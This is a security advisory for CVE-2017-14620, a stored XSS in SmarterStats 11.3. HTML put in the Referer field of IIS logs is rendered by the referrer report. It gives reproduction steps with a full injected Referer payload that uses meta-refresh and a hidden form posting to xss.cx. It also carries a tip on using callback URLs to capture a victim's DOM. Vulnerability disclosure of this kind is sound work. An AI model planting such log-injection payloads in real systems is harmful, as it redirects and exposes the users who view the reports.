CVE-2017-14620 SmarterStats V11.3.6347 will Render HTML Tags from the Referer Field of HTTP Logfiles

TL;DR CVE-2017-14620 SmarterStats V11.3.6347 will Render HTML Tags from the Referer Field of HTTP Logfiles

cve-2017-14620-smarterstats-version11-identification.PNG

SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles from URL /Data/Reports/ReferringURLsWithQueries

Reporter

David Hoyt | XSS.Cx

CVSS:3.0 Vector String

AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/CR:M/MAV:N/MAC:L/MPR:N/MUI:R/MS:U/MC:L/MI:N/MA:N

CVSS:3.0 Scores

Base Score 4.3, Temporal Score: 4.1, Environmental Score: 4.1

Keywords

CVE-2017-14620, CWE-533, CWE-532, CWE-117, CWE-93, CAPEC-86, CAPEC-79, Stored Document Object Model Cross Site Scripting (Stored DOM XSS), Client Side Request Forgery (CSRF), Open Redirection, HTTP Logfiles, Exploit, PoC, HTML Tags, SmarterStats 11.3

CVE-2017-14620 Requirements

SmarterStats Version 11.3	HTTP Proxy (BurpSuite, Fiddler)
Web Browser (Chrome - Current/Stable)	User Interaction Required - See Picture #1 - Must Click Referer Link Report

cve-2017-14620-smarterstats-version11-referer-element-ui-example.PNG Picture #1

CVE-2017-14620 Reproduction

Step 1: Test with an HTTP Logfile containing a URL-encoded String to the Referer Field with classic HTML Tags to be Rendered in a Browser:

http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" content=\"5; url=http://xss.cx/\"><title>Loading</title></head>\n<body><form method=\"post\" action=\"http://xss.cx/\" target=\"_top\" id=\"rf\"><input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/></form>\n<script>!function(e,t){var n,i;return!e.navigator&form=##&sc=#&sp=-#&qs=n&sk=z

Step 2: Verify the Injected IIS Logfile (Open the Log, Verify) as seen below in Picture #2 cve-2017-14620-smarterstats-version11-referer-injection-string-poc.PNG

Step 3: Process the Logfiles, Select the Referer URL Report. In an HTTP Proxy, watch the URL http://localhost:9999/Data/Reports/ReferringURLsWithQueries when Browsing http://localhost:9999/Default.aspx in Chrome (current/stable).

Step 4: Verify the Result in your HTTP Proxy returned from the Server:

{"c":[{"v":"http://www.bing.com/search?q=<html><head><meta http-equiv=\"refresh\" content=\"5; url=http://xss.cx/\"><title>Loading</title></head>\n<body><form method=\"post\" action=\"http://xss.cx/\" target=\"_top\" id=\"rf\"><input type=\"hidden\" name=\"ic\" value=\"0\"><input type=\"hidden\" name=\"fb\" value=\"true\"/></form>\n<script>!function(e,t){var n,i;return!e.navigator&form=MSNH14&sc=8-4&sp=-1&qs=n&sk="},{"v":"2","f":"2"}]}

In your Browser, the HTTP Response will cause a GET to xss.cx after 5 seconds.

Verify in HTTP Proxy.

...

GET / HTTP/1.1

Host: xss.cx

...

Step 5: Watch your Browser get Redirected to XSS.Cx.

Summary: The Referer Field in IIS Logfiles, and possibly other Field Names, are Rendered by SmarterStats Version 11.3.6347, a classic Stored DOM XSS.

Comments

Do not Render data directly from HTTP Logfiles
Include CORS Headers in all HTTP Responses
Assume all Inputs are Hostile

Tip

Bug Hunters should Inject a Custom URL into the Referer as a Callback from the Victim Site capturing the DOM and other evidence when Rendered.

Resources

HTTP Proxy - Burp Suite

Timeline

Reported to SmarterTools on September 19, 2017

Obtain CVE from MITRE on September 20, 2017

Resolved September 28, 2017 with Version 11.3.6480